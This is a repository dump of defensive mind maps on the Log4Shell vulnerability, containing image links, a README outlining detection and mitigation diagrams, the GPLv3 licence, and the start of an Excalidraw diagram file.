├── Log4shell
├── v2-detectLog4shell.png
├── Shield-Log4shell-v1.png
├── AmIVulnerable-Log4shell-v6.0.png
├── AmIVulnerable-Log4shell-v6.1.png
└── Shield-Log4shell-v1.excalidraw
├── README.md
└── LICENSE
/Log4shell/v2-detectLog4shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/v2-detectLog4shell.png
--------------------------------------------------------------------------------
/Log4shell/Shield-Log4shell-v1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/Shield-Log4shell-v1.png
--------------------------------------------------------------------------------
/Log4shell/AmIVulnerable-Log4shell-v6.0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/AmIVulnerable-Log4shell-v6.0.png
--------------------------------------------------------------------------------
/Log4shell/AmIVulnerable-Log4shell-v6.1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DickReverse/InfosecMindmaps/HEAD/Log4shell/AmIVulnerable-Log4shell-v6.1.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # InfosecMindmaps
2 |
3 | ## Log4Shell
4 | 3 mindmaps designed to help mitigating / protecting against the Log4shell vulnerability (lots of CVEs now...) :
5 | * Mind map #1 : Decision tree to identify if the code in-use is vulnerable
6 | * Mind map #2 : How to detect the vulnerability, from the black box or white box perspective
7 | * Mind map #3 : Shielding & mitigations against Log4shell : Patching is one thing, but defence in depth is advised. A few pointers in this mind map can help.
8 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/Log4shell/Shield-Log4shell-v1.excalidraw:
--------------------------------------------------------------------------------
1 | {
2 | "type": "excalidraw",
3 | "version": 2,
4 | "source": "https://excalidraw.com",
5 | "elements": [
6 | {
7 | "type": "text",
8 | "version": 316,
9 | "versionNonce": 1476859968,
10 | "isDeleted": false,
11 | "id": "Qlt3GHub2Fwr_knSTgdNo",
12 | "fillStyle": "hachure",
13 | "strokeWidth": 1,
14 | "strokeStyle": "solid",
15 | "roughness": 1,
16 | "opacity": 100,
17 | "angle": 0,
18 | "x": 694.5,
19 | "y": -5.5,
20 | "strokeColor": "#000000",
21 | "backgroundColor": "transparent",
22 | "width": 721,
23 | "height": 90,
24 | "seed": 889676736,
25 | "groupIds": [],
26 | "strokeSharpness": "sharp",
27 | "boundElements": [],
28 | "updated": 1639775213769,
29 | "fontSize": 36,
30 | "fontFamily": 1,
31 | "text": "Mind map #3\nShielding & Mitigations against Log4Shell",
32 | "baseline": 77,
33 | "textAlign": "center",
34 | "verticalAlign": "top",
35 | "containerId": null,
36 | "originalText": "Mind map #3\nShielding & Mitigations against Log4Shell"
37 | },
38 | {
39 | "id": "GpZQY-DHAbv0YkTmZPMOF",
40 | "type": "line",
41 | "x": 124.84205706032567,
42 | "y": 550.219751102027,
43 | "width": 2013.4076462251487,
44 | "height": 2.559958863604766,
45 | "angle": 0,
46 | "strokeColor": "#000000",
47 | "backgroundColor": "transparent",
48 | "fillStyle": "hachure",
49 | "strokeWidth": 1,
50 | "strokeStyle": "dashed",
51 | "roughness": 1,
52 | "opacity": 100,
53 | "groupIds": [],
54 | "strokeSharpness": "round",
55 | "seed": 1897834560,
56 | "version": 238,
57 | "versionNonce": 1640336320,
58 | "isDeleted": false,
59 | "boundElements": null,
60 | "updated": 1639775213769,
61 | "points": [
62 | [
63 | 0,
64 | 0
65 | ],
66 | [
67 | 2013.4076462251487,
68 | 2.559958863604766
69 | ]
70 | ],
71 | "lastCommittedPoint": null,
72 | "startBinding": null,
73 | "endBinding": null,
74 | "startArrowhead": null,
75 | "endArrowhead": null
76 | },
77 | {
78 | "id": "oUwz5wTwsfW78wHnB0bQA",
79 | "type": "text",
80 | "x": 122.42987659081422,
81 | "y": 475.9638501089124,
82 | "width": 445.4328422672292,
83 | "height": 63.99897159011915,
84 | "angle": 0,
85 | "strokeColor": "#c92a2a",
86 | "backgroundColor": "transparent",
87 | "fillStyle": "hachure",
88 | "strokeWidth": 1,
89 | "strokeStyle": "dashed",
90 | "roughness": 1,
91 | "opacity": 100,
92 | "groupIds": [],
93 | "strokeSharpness": "sharp",
94 | "seed": 398760896,
95 | "version": 202,
96 | "versionNonce": 804917312,
97 | "isDeleted": false,
98 | "boundElements": null,
99 | "updated": 1639775213769,
100 | "text": "First line of defense\nBlock / prevent before exploitation",
101 | "fontSize": 25.599588636047667,
102 | "fontFamily": 1,
103 | "textAlign": "left",
104 | "verticalAlign": "top",
